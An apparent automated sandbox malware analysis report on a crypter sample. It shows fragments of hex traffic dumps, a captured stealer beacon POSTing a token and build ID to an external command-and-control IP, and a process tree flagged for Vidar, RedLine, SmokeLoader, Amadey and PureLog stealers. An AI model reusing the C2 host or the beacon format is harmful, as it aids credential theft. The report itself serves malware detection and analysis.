T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-21 12:50:00 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.9	49818	116.203.165.127	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:50:04 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:50:04 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------CFIECBFIDGDAKFHIEHJKCont
2024-09-21 12:50:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:50:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:50:05 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	08:47:59
Start date:	21/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe"
Imagebase:	0x270000
File size:	2'457'088 bytes
MD5 hash:	96CB7DF578398D5D46DD4DAEFFBDC41F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:47:59
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x880000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe
Imagebase:	0x8b0000
File size:	3'141'632 bytes
MD5 hash:	1FEDF314D7C5ED06FF6833C9C8FE5441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
Imagebase:	0x990000
File size:	415'943 bytes
MD5 hash:	D399F8ABCA97B04F273F04322E4378BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.1888965030.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe
Imagebase:	0x400000
File size:	3'143'204 bytes
MD5 hash:	0A02550E0EA5490D4D80EE79661C99E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:48:27
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
Imagebase:	0x400000
File size:	6'666'862 bytes
MD5 hash:	8FB3610C4BA81A5A93666562E712740A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
Imagebase:	0x9b0000
File size:	4'249'600 bytes
MD5 hash:	ABDBCC23BD8F767E671BAC6D2FF60335
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
Imagebase:	0xe0000
File size:	423'328 bytes
MD5 hash:	A463E516041F4BC84F03BC8FE2B643DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe
Imagebase:	0x400000
File size:	418'816 bytes
MD5 hash:	2F59FBD6623872FBDC2F63D18023BFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
Imagebase:	0x510000
File size:	331'640 bytes
MD5 hash:	E8E6CD9EC48FAFCCC174F7BF07D045E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:48:26
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
Imagebase:	0xeb0000
File size:	361'336 bytes
MD5 hash:	D687AF3B103399AA245807BB719878B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.1829361336.0000000004155000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:48:27
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe
Imagebase:	0x400000
File size:	3'037'032 bytes
MD5 hash:	098E15E88E5332253356C78BADF8D479
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.2155274987.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:48:27
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
Imagebase:	0x140000000
File size:	11'496'960 bytes
MD5 hash:	D60D266E8FBDBD7794653ECF2ABA26ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:48:27
Start date:	21/09/2024
Path:	C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe
Imagebase:	0x7ff6b0d70000
File size:	22'487'040 bytes
MD5 hash:	CB3952F1852179348F8D2DB91760D03B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000011.00000002.2757239787.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000011.00000000.1618173689.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:48:27
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:48:27
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:48:27
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:48:29
Start date:	21/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	08:48:29
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
Imagebase:	0xe0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:48:30
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xaa0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.1704277964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:48:30
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xb00000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2588945166.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:48:30
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:48:30
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
Imagebase:	0xe0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:48:31
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x2a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:48:32
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:48:32
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.2552634631.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:48:32
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:48:32
Start date:	21/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2354690717.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.2425101444.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:48:32
Start date:	21/09/2024
Path:	C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe"
Imagebase:	0x400000
File size:	708'096 bytes
MD5 hash:	010CD22508FA12015E83A39FEB2DB9AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	08:48:33
Start date:	21/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff633410000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
